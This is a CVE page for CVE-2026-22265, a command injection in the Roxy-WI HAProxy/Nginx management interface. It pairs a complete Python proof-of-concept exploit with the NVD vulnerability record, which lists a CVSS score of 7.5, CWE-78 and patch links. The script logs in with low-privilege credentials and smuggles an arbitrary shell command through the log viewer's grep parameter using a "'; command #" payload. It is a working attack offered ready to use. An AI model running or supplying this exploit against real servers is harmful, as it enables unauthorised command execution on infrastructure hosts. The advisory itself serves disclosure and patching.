CVE-2026-22265

#!/usr/bin/env python3 """ CVE-2026-22265 Roxy-WI Command Injection PoC Affected: Roxy-WI < 8.2.8.2 Reference: https://github.com/roxy-wi/roxy-wi/security/advisories/GHSA-mmmf-vh7m-rm47 """ import requests import sys from urllib.parse import quote def exploit_roxywi(target_url, username, password, command): """ Exploit CVE-2026-22265: Command injection in logs.py grep parameter Args: target_url: Base URL of Roxy-WI instance username: Valid user credentials (low privilege is sufficient) password: User password command: System command to execute """ session = requests.Session() # Step 1: Login to obtain session login_url = f"{target_url}/login" login_data = { 'username': username, 'password': password } try: response = session.post(login_url, data=login_data, timeout=10) if response.status_code != 200: print(f"[-] Login failed with status code: {response.status_code}") return False # Step 2: Inject command via grep parameter in logs module # The vulnerability is in app/modules/roxywi/logs.py line 87 # grep parameter is used twice - once sanitized, once raw logs_url = f"{target_url}/logs" # Payload: escape sanitization and inject command # Using semicolon to chain commands, then comment out rest payload = f"'; {command} #" encoded_payload = quote(payload) exploit_data = { 'serv': '1', 'grep': encoded_payload, 'log': '/var/log/haproxy.log' } response = session.post(logs_url, data=exploit_data, timeout=10) if response.status_code == 200: print(f"[+] Command injection successful!") print(f"[*] Command executed: {command}") return True else: print(f"[-] Exploitation failed with status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 5: print("Usage: python3 cve-2026-22265.py <target_url> <username> <password> <command>") print("Example: python3 cve-2026-22265.py http://localhost:8080 admin password 'whoami'") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] cmd = sys.argv[4] print(f"[*] Targeting: {target}") print(f"[*] Credentials: {user}:{pwd}") print(f"[*] Target command: {cmd}") exploit_roxywi(target, user, pwd, cmd)

{"cve": {"id": "CVE-2026-22265", "sourceIdentifier": "[email protected]", "published": "2026-01-15T17:16:07.670", "lastModified": "2026-02-18T17:38:54.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. Prior to 8.2.8.2, command injection vulnerability exists in the log viewing functionality that allows authenticated users to execute arbitrary system commands. The vulnerability is in app/modules/roxywi/logs.py line 87, where the grep parameter is used twice - once sanitized and once raw. This vulnerability is fixed in 8.2.8.2."}, {"lang": "es", "value": "Roxy-WI es una interfaz web para gestionar servidores Haproxy, Nginx, Apache y Keepalived. Anteriormente a la versión 8.2.8.2, existe una vulnerabilidad de inyección de comandos en la funcionalidad de visualización de registros que permite a usuarios autenticados ejecutar comandos de sistema arbitrarios. La vulnerabilidad se encuentra en app/modules/roxywi/logs.py línea 87, donde el parámetro grep se utiliza dos veces — una vez saneado y otra sin procesar. Esta vulnerabilidad se corrigió en la versión 8.2.8.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:roxy-wi:roxy-wi:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.2.8.2", "matchCriteriaId": "29779791-CB73-48F7-A0FD-94C543DA082F"}]}]}], "references": [{"url": "https://github.com/roxy-wi/roxy-wi/commit/f040d3338c4ba6f66127487361592e32e0188eee", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/roxy-wi/roxy-wi/releases/tag/v8.2.8.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/roxy-wi/roxy-wi/security/advisories/GHSA-mmmf-vh7m-rm47", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}